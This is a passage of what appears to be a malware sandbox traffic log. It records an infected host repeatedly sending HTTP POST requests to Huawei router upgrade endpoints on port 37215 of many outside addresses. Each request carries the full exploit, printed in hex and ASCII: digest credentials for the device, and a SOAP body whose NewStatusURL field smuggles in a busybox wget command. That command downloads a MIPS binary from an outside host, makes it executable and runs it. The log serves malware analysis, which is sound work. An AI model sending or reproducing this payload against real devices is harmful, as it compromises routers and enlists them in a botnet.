                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.362128019 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:10.217881918 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:13.961716890 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:21.385428905 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:36.232855082 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:06.951627016 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      100192.168.2.1445458156.65.53.1537215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:06.628405094 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.861978054 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      101192.168.2.1439478102.254.146.8437215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:06.629451036 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:07.434072018 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.362128019 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
